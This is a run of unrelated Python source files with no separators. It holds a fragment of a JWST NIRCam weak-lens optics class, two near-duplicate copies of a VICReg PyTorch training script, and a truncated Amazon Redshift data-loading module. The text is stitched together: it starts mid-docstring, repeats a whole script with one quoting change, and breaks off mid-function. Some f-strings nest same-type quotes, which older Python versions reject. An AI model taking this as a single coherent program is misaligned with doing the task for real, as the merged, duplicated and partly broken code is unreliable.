include_power, include_astigmatism : bool Can be used to selectively enable/disable parts of the optical model. Intended for debugging; should no need to be set by users in general. """ def __init__(self, name='WLP8', instrument=None, center_fp_only=False, verbose=False, include_power=True, include_astigmatism=True, **kwargs): super().__init__(name=name) self.ref_wavelength = 2.12e-6 # reference wavelength for defocus self.verbose = verbose if instrument is None: self.module = 'A' self.v2v3_coords = (0, -468 / 60) npix = 1024 else: self.module = instrument.module self.v2v3_coords = instrument._tel_coords() npix, pixelscale = _get_initial_pupil_sampling(instrument) self.ztable_full = None ## REFERENCE: # NIRCam weak lenses, values from WSS config file, PRDOPSFLT-027 # A B # WLP4_diversity = 8.27309 8.3443 diversity in microns # WLP8_diversity = 16.4554 16.5932 # WLM8_diversity = -16.4143 -16.5593 # WL_wavelength = 2.12 Wavelength, in microns if center_fp_only or instrument is None: # use the center field point power only. No field dependence # Power in P-V waves at center field point in optical model # JWST-REF-046515, table 2 Mod A: Mod B: power_at_center_fp = {'WLM8': (-8.0188, -7.9521), 'WLM4': (-4.0285, -3.9766), 'WLP4': (3.9797, 3.9665), 'WLP8': (8.0292, 7.9675), 'WLP12': (12.0010, 11.9275)} power_pv = power_at_center_fp[self.name][0 if self.module == 'A' else 1] astig0 = 0 astig45 = 0 else: closest_fp = self.find_closest_isim_fp_name(instrument) if verbose: print(closest_fp) power_pv, astig0, astig45 = self.lookup_empirical_lens_power(name, closest_fp) self.power_pv_waves = power_pv pv2rms_norm = self.ref_wavelength / (2 * np.sqrt(3)) # convert desired PV waves to RMS microns for power # since the below function wants inputs in RMS self.power_rms_microns = power_pv * pv2rms_norm zernike_coefficients = np.zeros(6) if include_power: zernike_coefficients[3] = self.power_rms_microns if include_astigmatism: zernike_coefficients[4] = astig0 zernike_coefficients[5] = astig45 self.zernike_coefficients = zernike_coefficients self.opd = poppy.zernike.opd_from_zernikes( zernike_coefficients, npix=npix, outside=0 ) self.amplitude = np.ones_like(self.opd) def find_closest_isim_fp_name(self, instr): """Find the closest ISIM CV field point to a given instrument object, i.e. the field point closest to the configured detector and coordinates """ if self.ztable_full is None: zernike_file = os.path.join(utils.get_webbpsf_data_path(), "si_zernikes_isim_cv3.fits") self.ztable_full = Table.read(zernike_file) lookup_name = f"NIRCam{instr.channel.upper()[0]}W{instr.module}" ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name] self._ztable = ztable self._instr = instr telcoords_am = instr._tel_coords().to(units.arcmin).value if self.verbose: print(telcoords_am) r = np.sqrt((telcoords_am[0] - ztable['V2']) ** 2 + (telcoords_am[1] - ztable['V3']) ** 2) # Save closest ISIM CV3 WFE measured field point for reference row = ztable[r == r.min()] return row['field_point_name'] def lookup_empirical_lens_power(self, lens_name, field_point_name): """ Lookup lens power and astigmatism versus field position, from empirical calibrations from ISIM CV testing """ mypath = os.path.dirname(os.path.abspath(__file__)) + os.sep wl_data_file = os.path.join(mypath, 'otelm', 'NIRCam_WL_Empirical_Power.csv') wl_data = Table.read(wl_data_file, comment='#', header_start=1) field_point_row = wl_data[wl_data['Field'] == field_point_name] if self.verbose: print(field_point_row) defocus_name = lens_name[2:] power = field_point_row[defocus_name].data[0] # Fringe zernike coefficients, from Telfer's table z5 = field_point_row[defocus_name+"_Z5"].data[0] z6 = field_point_row[defocus_name + "_Z6"].data[0] # Have to convert Zernike normalization and order from fringe to noll, and nanometers to meters astig0 = z6 / np.sqrt(6)*1e-9 astig45 = z5 / np.sqrt(6)*1e-9 if self.verbose: print(power) return power, astig0, astig45
# Copyright (c) Meta Platforms, Inc. and affiliates. # All rights reserved. # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. from pathlib import Path import argparse import json import math import os import sys import time import torch import torch.nn.functional as F from torch import nn, optim import torch.distributed as dist import torchvision.datasets as datasets import augmentations as aug from distributed import init_distributed_mode import resnet def get_arguments(): parser = argparse.ArgumentParser(description="Pretrain a resnet model with VICReg", add_help=False) # Data parser.add_argument("--data-dir", type=Path, default="/path/to/imagenet", required=True, help='Path to the image net dataset') # Checkpoints parser.add_argument("--exp-dir", type=Path, default="./exp", help='Path to the experiment folder, where all logs/checkpoints will be stored') parser.add_argument("--log-freq-time", type=int, default=60, help='Print logs to the stats.txt file every [log-freq-time] seconds') # Model parser.add_argument("--arch", type=str, default="resnet50", help='Architecture of the backbone encoder network') parser.add_argument("--mlp", default="8192-8192-8192", help='Size and number of layers of the MLP expander head') # Optim parser.add_argument("--epochs", type=int, default=100, help='Number of epochs') parser.add_argument("--batch-size", type=int, default=2048, help='Effective batch size (per worker batch size is [batch-size] / world-size)') parser.add_argument("--base-lr", type=float, default=0.2, help='Base learning rate, effective learning after warmup is [base-lr] * [batch-size] / 256') parser.add_argument("--wd", type=float, default=1e-6, help='Weight decay') # Loss parser.add_argument("--sim-coeff", type=float, default=25.0, help='Invariance regularization loss coefficient') parser.add_argument("--std-coeff", type=float, default=25.0, help='Variance regularization loss coefficient') parser.add_argument("--cov-coeff", type=float, default=1.0, help='Covariance regularization loss coefficient') # Running parser.add_argument("--num-workers", type=int, default=10) parser.add_argument('--device', default='cuda', help='device to use for training / testing') # Distributed parser.add_argument('--world-size', default=1, type=int, help='number of distributed processes') parser.add_argument('--local_rank', default=-1, type=int) parser.add_argument('--dist-url', default='env://', help='url used to set up distributed training') return parser def main(args): torch.backends.cudnn.benchmark = True init_distributed_mode(args) print(args) gpu = torch.device(args.device) if args.rank == 0: args.exp_dir.mkdir(parents=True, exist_ok=True) stats_file = open(args.exp_dir / "stats.txt", "a", buffering=1) print(" ".join(sys.argv)) print(" ".join(sys.argv), file=stats_file) transforms = aug.TrainTransform() dataset = datasets.ImageFolder(args.data_dir / "train", transforms) sampler = torch.utils.data.distributed.DistributedSampler(dataset, shuffle=True) assert args.batch_size % args.world_size == 0 per_device_batch_size = args.batch_size // args.world_size loader = torch.utils.data.DataLoader( dataset, batch_size=per_device_batch_size, num_workers=args.num_workers, pin_memory=True, sampler=sampler, ) model = VICReg(args).cuda(gpu) model = nn.SyncBatchNorm.convert_sync_batchnorm(model) model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[gpu]) optimizer = LARS( model.parameters(), lr=0, weight_decay=args.wd, weight_decay_filter=exclude_bias_and_norm, lars_adaptation_filter=exclude_bias_and_norm, ) if (args.exp_dir / "model.pth").is_file(): if args.rank == 0: print("resuming from checkpoint") ckpt = torch.load(args.exp_dir / "model.pth", map_location="cpu") start_epoch = ckpt["epoch"] model.load_state_dict(ckpt["model"]) optimizer.load_state_dict(ckpt["optimizer"]) else: start_epoch = 0 start_time = last_logging = time.time() scaler = torch.cuda.amp.GradScaler() for epoch in range(start_epoch, args.epochs): sampler.set_epoch(epoch) for step, ((x, y), _) in enumerate(loader, start=epoch * len(loader)): x = x.cuda(gpu, non_blocking=True) y = y.cuda(gpu, non_blocking=True) lr = adjust_learning_rate(args, optimizer, loader, step) optimizer.zero_grad() with torch.cuda.amp.autocast(): loss = model.forward(x, y) scaler.scale(loss).backward() scaler.step(optimizer) scaler.update() current_time = time.time() if args.rank == 0 and current_time - last_logging > args.log_freq_time: stats = dict( epoch=epoch, step=step, loss=loss.item(), time=int(current_time - start_time), lr=lr, ) print(json.dumps(stats)) print(json.dumps(stats), file=stats_file) last_logging = current_time if args.rank == 0: state = dict( epoch=epoch + 1, model=model.state_dict(), optimizer=optimizer.state_dict(), ) torch.save(state, args.exp_dir / "model.pth") if args.rank == 0: torch.save(model.module.backbone.state_dict(), args.exp_dir / "resnet50.pth") def adjust_learning_rate(args, optimizer, loader, step): max_steps = args.epochs * len(loader) warmup_steps = 10 * len(loader) base_lr = args.base_lr * args.batch_size / 256 if step < warmup_steps: lr = base_lr * step / warmup_steps else: step -= warmup_steps max_steps -= warmup_steps q = 0.5 * (1 + math.cos(math.pi * step / max_steps)) end_lr = base_lr * 0.001 lr = base_lr * q + end_lr * (1 - q) for param_group in optimizer.param_groups: param_group["lr"] = lr return lr class VICReg(nn.Module): def __init__(self, args): super().__init__() self.args = args self.num_features = int(args.mlp.split("-")[-1]) self.backbone, self.embedding = resnet.__dict__[args.arch]( zero_init_residual=True ) self.projector = Projector(args, self.embedding) def forward(self, x, y): x = self.projector(self.backbone(x)) y = self.projector(self.backbone(y)) repr_loss = F.mse_loss(x, y) x = torch.cat(FullGatherLayer.apply(x), dim=0) y = torch.cat(FullGatherLayer.apply(y), dim=0) x = x - x.mean(dim=0) y = y - y.mean(dim=0) std_x = torch.sqrt(x.var(dim=0) + 0.0001) std_y = torch.sqrt(y.var(dim=0) + 0.0001) std_loss = torch.mean(F.relu(1 - std_x)) / 2 + torch.mean(F.relu(1 - std_y)) / 2 cov_x = (x.T @ x) / (self.args.batch_size - 1) cov_y = (y.T @ y) / (self.args.batch_size - 1) cov_loss = off_diagonal(cov_x).pow_(2).sum().div( self.num_features ) + off_diagonal(cov_y).pow_(2).sum().div(self.num_features) loss = ( self.args.sim_coeff * repr_loss + self.args.std_coeff * std_loss + self.args.cov_coeff * cov_loss ) return loss def Projector(args, embedding): mlp_spec = f"{embedding}-{args.mlp}" layers = [] f = list(map(int, mlp_spec.split("-"))) for i in range(len(f) - 2): layers.append(nn.Linear(f[i], f[i + 1])) layers.append(nn.BatchNorm1d(f[i + 1])) layers.append(nn.ReLU(True)) layers.append(nn.Linear(f[-2], f[-1], bias=False)) return nn.Sequential(*layers) def exclude_bias_and_norm(p): return p.ndim == 1 def off_diagonal(x): n, m = x.shape assert n == m return x.flatten()[:-1].view(n - 1, n + 1)[:, 1:].flatten() class LARS(optim.Optimizer): def __init__( self, params, lr, weight_decay=0, momentum=0.9, eta=0.001, weight_decay_filter=None, lars_adaptation_filter=None, ): defaults = dict( lr=lr, weight_decay=weight_decay, momentum=momentum, eta=eta, weight_decay_filter=weight_decay_filter, lars_adaptation_filter=lars_adaptation_filter, ) super().__init__(params, defaults) @torch.no_grad() def step(self): for g in self.param_groups: for p in g["params"]: dp = p.grad if dp is None: continue if g["weight_decay_filter"] is None or not g["weight_decay_filter"](p): dp = dp.add(p, alpha=g["weight_decay"]) if g["lars_adaptation_filter"] is None or not g[ "lars_adaptation_filter" ](p): param_norm = torch.norm(p) update_norm = torch.norm(dp) one = torch.ones_like(param_norm) q = torch.where( param_norm > 0.0, torch.where( update_norm > 0, (g["eta"] * param_norm / update_norm), one ), one, ) dp = dp.mul(q) param_state = self.state[p] if "mu" not in param_state: param_state["mu"] = torch.zeros_like(p) mu = param_state["mu"] mu.mul_(g["momentum"]).add_(dp) p.add_(mu, alpha=-g["lr"]) def batch_all_gather(x): x_list = FullGatherLayer.apply(x) return torch.cat(x_list, dim=0) class FullGatherLayer(torch.autograd.Function): """ Gather tensors from all process and support backward propagation for the gradients across processes. """ @staticmethod def forward(ctx, x): output = [torch.zeros_like(x) for _ in range(dist.get_world_size())] dist.all_gather(output, x) return tuple(output) @staticmethod def backward(ctx, *grads): all_gradients = torch.stack(grads) dist.all_reduce(all_gradients) return all_gradients[dist.get_rank()] def handle_sigusr1(signum, frame): os.system(f'scontrol requeue {os.environ['SLURM_JOB_ID']}') exit() def handle_sigterm(signum, frame): pass if __name__ == "__main__": parser = argparse.ArgumentParser('VICReg training script', parents=[get_arguments()]) args = parser.parse_args() main(args)
# Copyright (c) Meta Platforms, Inc. and affiliates. # All rights reserved. # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. from pathlib import Path import argparse import json import math import os import sys import time import torch import torch.nn.functional as F from torch import nn, optim import torch.distributed as dist import torchvision.datasets as datasets import augmentations as aug from distributed import init_distributed_mode import resnet def get_arguments(): parser = argparse.ArgumentParser(description="Pretrain a resnet model with VICReg", add_help=False) # Data parser.add_argument("--data-dir", type=Path, default="/path/to/imagenet", required=True, help='Path to the image net dataset') # Checkpoints parser.add_argument("--exp-dir", type=Path, default="./exp", help='Path to the experiment folder, where all logs/checkpoints will be stored') parser.add_argument("--log-freq-time", type=int, default=60, help='Print logs to the stats.txt file every [log-freq-time] seconds') # Model parser.add_argument("--arch", type=str, default="resnet50", help='Architecture of the backbone encoder network') parser.add_argument("--mlp", default="8192-8192-8192", help='Size and number of layers of the MLP expander head') # Optim parser.add_argument("--epochs", type=int, default=100, help='Number of epochs') parser.add_argument("--batch-size", type=int, default=2048, help='Effective batch size (per worker batch size is [batch-size] / world-size)') parser.add_argument("--base-lr", type=float, default=0.2, help='Base learning rate, effective learning after warmup is [base-lr] * [batch-size] / 256') parser.add_argument("--wd", type=float, default=1e-6, help='Weight decay') # Loss parser.add_argument("--sim-coeff", type=float, default=25.0, help='Invariance regularization loss coefficient') parser.add_argument("--std-coeff", type=float, default=25.0, help='Variance regularization loss coefficient') parser.add_argument("--cov-coeff", type=float, default=1.0, help='Covariance regularization loss coefficient') # Running parser.add_argument("--num-workers", type=int, default=10) parser.add_argument('--device', default='cuda', help='device to use for training / testing') # Distributed parser.add_argument('--world-size', default=1, type=int, help='number of distributed processes') parser.add_argument('--local_rank', default=-1, type=int) parser.add_argument('--dist-url', default='env://', help='url used to set up distributed training') return parser def main(args): torch.backends.cudnn.benchmark = True init_distributed_mode(args) print(args) gpu = torch.device(args.device) if args.rank == 0: args.exp_dir.mkdir(parents=True, exist_ok=True) stats_file = open(args.exp_dir / "stats.txt", "a", buffering=1) print(" ".join(sys.argv)) print(" ".join(sys.argv), file=stats_file) transforms = aug.TrainTransform() dataset = datasets.ImageFolder(args.data_dir / "train", transforms) sampler = torch.utils.data.distributed.DistributedSampler(dataset, shuffle=True) assert args.batch_size % args.world_size == 0 per_device_batch_size = args.batch_size // args.world_size loader = torch.utils.data.DataLoader( dataset, batch_size=per_device_batch_size, num_workers=args.num_workers, pin_memory=True, sampler=sampler, ) model = VICReg(args).cuda(gpu) model = nn.SyncBatchNorm.convert_sync_batchnorm(model) model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[gpu]) optimizer = LARS( model.parameters(), lr=0, weight_decay=args.wd, weight_decay_filter=exclude_bias_and_norm, lars_adaptation_filter=exclude_bias_and_norm, ) if (args.exp_dir / "model.pth").is_file(): if args.rank == 0: print("resuming from checkpoint") ckpt = torch.load(args.exp_dir / "model.pth", map_location="cpu") start_epoch = ckpt["epoch"] model.load_state_dict(ckpt["model"]) optimizer.load_state_dict(ckpt["optimizer"]) else: start_epoch = 0 start_time = last_logging = time.time() scaler = torch.cuda.amp.GradScaler() for epoch in range(start_epoch, args.epochs): sampler.set_epoch(epoch) for step, ((x, y), _) in enumerate(loader, start=epoch * len(loader)): x = x.cuda(gpu, non_blocking=True) y = y.cuda(gpu, non_blocking=True) lr = adjust_learning_rate(args, optimizer, loader, step) optimizer.zero_grad() with torch.cuda.amp.autocast(): loss = model.forward(x, y) scaler.scale(loss).backward() scaler.step(optimizer) scaler.update() current_time = time.time() if args.rank == 0 and current_time - last_logging > args.log_freq_time: stats = dict( epoch=epoch, step=step, loss=loss.item(), time=int(current_time - start_time), lr=lr, ) print(json.dumps(stats)) print(json.dumps(stats), file=stats_file) last_logging = current_time if args.rank == 0: state = dict( epoch=epoch + 1, model=model.state_dict(), optimizer=optimizer.state_dict(), ) torch.save(state, args.exp_dir / "model.pth") if args.rank == 0: torch.save(model.module.backbone.state_dict(), args.exp_dir / "resnet50.pth") def adjust_learning_rate(args, optimizer, loader, step): max_steps = args.epochs * len(loader) warmup_steps = 10 * len(loader) base_lr = args.base_lr * args.batch_size / 256 if step < warmup_steps: lr = base_lr * step / warmup_steps else: step -= warmup_steps max_steps -= warmup_steps q = 0.5 * (1 + math.cos(math.pi * step / max_steps)) end_lr = base_lr * 0.001 lr = base_lr * q + end_lr * (1 - q) for param_group in optimizer.param_groups: param_group["lr"] = lr return lr class VICReg(nn.Module): def __init__(self, args): super().__init__() self.args = args self.num_features = int(args.mlp.split("-")[-1]) self.backbone, self.embedding = resnet.__dict__[args.arch]( zero_init_residual=True ) self.projector = Projector(args, self.embedding) def forward(self, x, y): x = self.projector(self.backbone(x)) y = self.projector(self.backbone(y)) repr_loss = F.mse_loss(x, y) x = torch.cat(FullGatherLayer.apply(x), dim=0) y = torch.cat(FullGatherLayer.apply(y), dim=0) x = x - x.mean(dim=0) y = y - y.mean(dim=0) std_x = torch.sqrt(x.var(dim=0) + 0.0001) std_y = torch.sqrt(y.var(dim=0) + 0.0001) std_loss = torch.mean(F.relu(1 - std_x)) / 2 + torch.mean(F.relu(1 - std_y)) / 2 cov_x = (x.T @ x) / (self.args.batch_size - 1) cov_y = (y.T @ y) / (self.args.batch_size - 1) cov_loss = off_diagonal(cov_x).pow_(2).sum().div( self.num_features ) + off_diagonal(cov_y).pow_(2).sum().div(self.num_features) loss = ( self.args.sim_coeff * repr_loss + self.args.std_coeff * std_loss + self.args.cov_coeff * cov_loss ) return loss def Projector(args, embedding): mlp_spec = f"{embedding}-{args.mlp}" layers = [] f = list(map(int, mlp_spec.split("-"))) for i in range(len(f) - 2): layers.append(nn.Linear(f[i], f[i + 1])) layers.append(nn.BatchNorm1d(f[i + 1])) layers.append(nn.ReLU(True)) layers.append(nn.Linear(f[-2], f[-1], bias=False)) return nn.Sequential(*layers) def exclude_bias_and_norm(p): return p.ndim == 1 def off_diagonal(x): n, m = x.shape assert n == m return x.flatten()[:-1].view(n - 1, n + 1)[:, 1:].flatten() class LARS(optim.Optimizer): def __init__( self, params, lr, weight_decay=0, momentum=0.9, eta=0.001, weight_decay_filter=None, lars_adaptation_filter=None, ): defaults = dict( lr=lr, weight_decay=weight_decay, momentum=momentum, eta=eta, weight_decay_filter=weight_decay_filter, lars_adaptation_filter=lars_adaptation_filter, ) super().__init__(params, defaults) @torch.no_grad() def step(self): for g in self.param_groups: for p in g["params"]: dp = p.grad if dp is None: continue if g["weight_decay_filter"] is None or not g["weight_decay_filter"](p): dp = dp.add(p, alpha=g["weight_decay"]) if g["lars_adaptation_filter"] is None or not g[ "lars_adaptation_filter" ](p): param_norm = torch.norm(p) update_norm = torch.norm(dp) one = torch.ones_like(param_norm) q = torch.where( param_norm > 0.0, torch.where( update_norm > 0, (g["eta"] * param_norm / update_norm), one ), one, ) dp = dp.mul(q) param_state = self.state[p] if "mu" not in param_state: param_state["mu"] = torch.zeros_like(p) mu = param_state["mu"] mu.mul_(g["momentum"]).add_(dp) p.add_(mu, alpha=-g["lr"]) def batch_all_gather(x): x_list = FullGatherLayer.apply(x) return torch.cat(x_list, dim=0) class FullGatherLayer(torch.autograd.Function): """ Gather tensors from all process and support backward propagation for the gradients across processes. """ @staticmethod def forward(ctx, x): output = [torch.zeros_like(x) for _ in range(dist.get_world_size())] dist.all_gather(output, x) return tuple(output) @staticmethod def backward(ctx, *grads): all_gradients = torch.stack(grads) dist.all_reduce(all_gradients) return all_gradients[dist.get_rank()] def handle_sigusr1(signum, frame): os.system(f'scontrol requeue {os.environ["SLURM_JOB_ID"]}') exit() def handle_sigterm(signum, frame): pass if __name__ == "__main__": parser = argparse.ArgumentParser('VICReg training script', parents=[get_arguments()]) args = parser.parse_args() main(args)
"""Amazon Redshift Module.""" # pylint: disable=too-many-lines import logging import uuid from typing import Any, Dict, Iterator, List, Optional, Tuple, Union import boto3 import botocore import pandas as pd import pyarrow as pa import redshift_connector from awswrangler import _data_types from awswrangler import _databases as _db_utils from awswrangler import _utils, exceptions, s3 from awswrangler._config import apply_configs _logger: logging.Logger = logging.getLogger(__name__) _RS_DISTSTYLES: List[str] = ["AUTO", "EVEN", "ALL", "KEY"] _RS_SORTSTYLES: List[str] = ["COMPOUND", "INTERLEAVED"] def _validate_connection(con: redshift_connector.Connection) -> None: if not isinstance(con, redshift_connector.Connection): raise exceptions.InvalidConnection( "Invalid 'conn' argument, please pass a " "redshift_connector.Connection object. Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog." ) def _begin_transaction(cursor: redshift_connector.Cursor) -> None: sql = "BEGIN TRANSACTION" _logger.debug("Begin transaction query:\n%s", sql) cursor.execute(sql) def _drop_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str, cascade: bool = False) -> None: schema_str = f'"{schema}".' if schema else "" cascade_str = " CASCADE" if cascade else "" sql = f'DROP TABLE IF EXISTS {schema_str}"{table}"' f"{cascade_str}" _logger.debug("Drop table query:\n%s", sql) cursor.execute(sql) def _truncate_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' if schema else "" sql = f'TRUNCATE TABLE {schema_str}"{table}"' _logger.debug("Truncate table query:\n%s", sql) cursor.execute(sql) def _delete_all(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' if schema else "" sql = f'DELETE FROM {schema_str}"{table}"' _logger.debug("Delete query:\n%s", sql) cursor.execute(sql) def _get_primary_keys(cursor: redshift_connector.Cursor, schema: str, table: str) -> List[str]: cursor.execute(f"SELECT indexdef FROM pg_indexes WHERE schemaname = '{schema}' AND tablename = '{table}'") result: str = cursor.fetchall()[0][0] rfields: List[str] = result.split("(")[1].strip(")").split(",") fields: List[str] = [field.strip().strip('"') for field in rfields] return fields def _does_table_exist(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> bool: schema_str = f"TABLE_SCHEMA = '{schema}' AND" if schema else "" cursor.execute( f"SELECT true WHERE EXISTS (" f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE " f"{schema_str} TABLE_NAME = '{table}'" f");" ) return len(cursor.fetchall()) > 0 def _make_s3_auth_string( aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, iam_role: Optional[str] = None, boto3_session: Optional[boto3.Session] = None, ) -> str: if aws_access_key_id is not None and aws_secret_access_key is not None: auth_str: str = f"ACCESS_KEY_ID '{aws_access_key_id}'\nSECRET_ACCESS_KEY '{aws_secret_access_key}'\n" if aws_session_token is not None: auth_str += f"SESSION_TOKEN '{aws_session_token}'\n" elif iam_role is not None: auth_str = f"IAM_ROLE '{iam_role}'\n" else: _logger.debug("Attempting to get S3 authorization credentials from boto3 session.") credentials: botocore.credentials.ReadOnlyCredentials credentials = _utils.get_credentials_from_session(boto3_session=boto3_session) if credentials.access_key is None or credentials.secret_key is None: raise exceptions.InvalidArgument( "One of IAM Role or AWS ACCESS_KEY_ID and SECRET_ACCESS_KEY must be " "given. Unable to find ACCESS_KEY_ID and SECRET_ACCESS_KEY in boto3 " "session." ) auth_str = f"ACCESS_KEY_ID '{credentials.access_key}'\nSECRET_ACCESS_KEY '{credentials.secret_key}'\n" if credentials.token is not None: auth_str += f"SESSION_TOKEN '{credentials.token}'\n" return auth_str def _copy( cursor: redshift_connector.Cursor, path: str, table: str, serialize_to_json: bool, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, boto3_session: Optional[str] = None, schema: Optional[str] = None, ) -> None: if schema is None: table_name: str = f'"{table}"' else: table_name = f'"{schema}"."{table}"' auth_str: str = _make_s3_auth_string( iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=boto3_session, ) ser_json_str: str = " SERIALIZETOJSON" if serialize_to_json else "" sql: str = f"COPY {table_name}\nFROM '{path}' {auth_str}\nFORMAT AS PARQUET{ser_json_str}" _logger.debug("copy query:\n%s", sql) cursor.execute(sql) def _lock( cursor: redshift_connector.Cursor, table_names: List[str], schema: Optional[str] = None, ) -> None: fmt = '"{schema}"."{table}"' if schema else '"{table}"' tables = ", ".join([fmt.format(schema=schema, table=table) for table in table_names]) sql: str = f"LOCK {tables};\n" _logger.debug("lock query:\n%s", sql) cursor.execute(sql) def _upsert( cursor: redshift_connector.Cursor, table: str, temp_table: str, schema: str, primary_keys: Optional[List[str]] = None, ) -> None: if not primary_keys: primary_keys = _get_primary_keys(cursor=cursor, schema=schema, table=table) _logger.debug("primary_keys: %s", primary_keys) if not primary_keys: raise exceptions.InvalidRedshiftPrimaryKeys() equals_clause: str = f"{table}.%s = {temp_table}.%s" join_clause: str = " AND ".join([equals_clause % (pk, pk) for pk in primary_keys]) sql: str = f'DELETE FROM "{schema}"."{table}" USING {temp_table} WHERE {join_clause}' _logger.debug(sql) cursor.execute(sql) sql = f"INSERT INTO {schema}.{table} SELECT * FROM {temp_table}" _logger.debug(sql) cursor.execute(sql) _drop_table(cursor=cursor, schema=schema, table=temp_table) def _validate_parameters( redshift_types: Dict[str, str], diststyle: str, distkey: Optional[str], sortstyle: str, sortkey: Optional[List[str]], ) -> None: if diststyle not in _RS_DISTSTYLES: raise exceptions.InvalidRedshiftDiststyle(f"diststyle must be in {_RS_DISTSTYLES}") cols = list(redshift_types.keys()) _logger.debug("Redshift columns: %s", cols) if (diststyle == "KEY") and (not distkey): raise exceptions.InvalidRedshiftDistkey("You must pass a distkey if you intend to use KEY diststyle") if distkey and distkey not in cols: raise exceptions.InvalidRedshiftDistkey(f"distkey ({distkey}) must be in the columns list: {cols})") if sortstyle and sortstyle not in _RS_SORTSTYLES: raise exceptions.InvalidRedshiftSortstyle(f"sortstyle must be in {_RS_SORTSTYLES}") if sortkey: if not isinstance(sortkey, list): raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. " f"Currently value: {sortkey}" ) for key in sortkey: if key not in cols: raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. " f"Currently value: {key}" ) def _redshift_types_from_path( path: Optional[Union[str, List[str]]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float, path_suffix: Optional[str], path_ignore_suffix: Optional[str], use_threads: Union[bool, int], boto3_session: Optional[boto3.Session], s3_additional_kwargs: Optional[Dict[str, str]], ) -> Dict[str, str]: """Extract Redshift data types from a Pandas DataFrame.""" _varchar_lengths: Dict[str, int] = {} if varchar_lengths is None else varchar_lengths session: boto3.Session = _utils.ensure_session(session=boto3_session) _logger.debug("Scanning parquet schemas on s3...") athena_types, _ = s3.read_parquet_metadata( path=path, sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, dataset=False, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) _logger.debug("athena_types: %s", athena_types) redshift_types: Dict[str, str] = {} for col_name, col_type in athena_types.items(): length: int = _varchar_lengths[col_name] if col_name in _varchar_lengths else varchar_lengths_default redshift_types[col_name] = _data_types.athena2redshift(dtype=col_type, varchar_length=length) return redshift_types def _create_table( # pylint: disable=too-many-locals,too-many-arguments df: Optional[pd.DataFrame], path: Optional[Union[str, List[str]]], con: redshift_connector.Connection, cursor: redshift_connector.Cursor, table: str, schema: str, mode: str, overwrite_method: str, index: bool, dtype: Optional[Dict[str, str]], diststyle: str, sortstyle: str, distkey: Optional[str], sortkey: Optional[List[str]], primary_keys: Optional[List[str]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float = 1.0, path_suffix: Optional[str] = None, path_ignore_suffix: Optional[str] = None, use_threads: Union[bool, int] = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> Tuple[str, Optional[str]]: if mode == "overwrite": if overwrite_method == "truncate": try: # Truncate commits current transaction, if successful. # Fast, but not atomic. _truncate_table(cursor=cursor, schema=schema, table=table) except redshift_connector.error.ProgrammingError as e: # Caught "relation does not exist". if e.args[0]["C"] != "42P01": # pylint: disable=invalid-sequence-index raise e _logger.debug(str(e)) con.rollback() _begin_transaction(cursor=cursor) elif overwrite_method == "delete": if _does_table_exist(cursor=cursor, schema=schema, table=table): # Atomic, but slow. _delete_all(cursor=cursor, schema=schema, table=table) else: # Fast, atomic, but either fails if there are any dependent views or, in cascade mode, deletes them. _drop_table(cursor=cursor, schema=schema, table=table, cascade=bool(overwrite_method == "cascade")) elif _does_table_exist(cursor=cursor, schema=schema, table=table) is True: if mode == "upsert": guid: str = uuid.uuid4().hex temp_table: str = f"temp_redshift_{guid}" sql: str = f'CREATE TEMPORARY TABLE {temp_table} (LIKE "{schema}"."{table}")' _logger.debug(sql) cursor.execute(sql) return temp_table, None return table, schema diststyle = diststyle.upper() if diststyle else "AUTO" sortstyle = sortstyle.upper() if sortstyle else "COMPOUND" if df is not None: redshift_types: Dict[str, str] = _data_types.database_types_from_pandas( df=df, index=index, dtype=dtype, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, converter_func=_data_types.pyarrow2redshift, ) elif path is not None: redshift_types = _redshift_types_from_path( path=path, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, parquet_infer_sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) else: raise ValueError("df and path are None.You MUST pass at least one.") _validate_parameters( redshift_types=redshift_types, diststyle=diststyle, distkey=distkey, sortstyle=sortstyle, sortkey=sortkey, ) cols_str: str = "".join([f"{k} {v},\n" for k, v in redshift_types.items()])[:-2] primary_keys_str: str = f",\nPRIMARY KEY ({", ".join(primary_keys)})" if primary_keys else "" distkey_str: str = f"\nDISTKEY({distkey})" if distkey and diststyle == "KEY" else "" sortkey_str: str = f"\n{sortstyle} SORTKEY({",".join(sortkey)})" if sortkey else "" sql = ( f'CREATE TABLE IF NOT EXISTS "{schema}"."{table}" (\n' f"{cols_str}" f"{primary_keys_str}" f")\nDISTSTYLE {diststyle}" f"{distkey_str}" f"{sortkey_str}" ) _logger.debug("Create table query:\n%s", sql) cursor.execute(sql) return table, schema def _read_parquet_iterator( path: str, keep_files: bool, use_threads: Union[bool, int], categories: Optional[List[str]], chunked: Union[bool, int], boto3_session: Optional[boto3.Session], s3_additional_kwargs: 